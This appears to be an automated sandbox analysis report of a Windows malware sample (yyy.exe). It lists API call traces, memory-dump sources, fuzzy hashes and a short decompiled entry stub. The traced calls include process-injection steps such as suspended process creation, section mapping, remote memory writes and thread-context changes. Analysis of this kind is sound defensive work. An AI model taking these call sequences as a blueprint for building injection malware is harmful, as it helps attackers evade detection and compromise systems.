GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: yyya.exe Analysis ID: 67591

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	479B945127CC75C2A44ED1B13482FB07
Total matches:	32
Initial Analysis Report:	Open
Initial sample Analysis ID:	67591
Initial sample SHA 256:	CA5C9DCD28B358A05CF0F3CDA193EB48861E9B0A51E8656C23BE5CAEDF1D2012
Initial sample name:	yyy.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
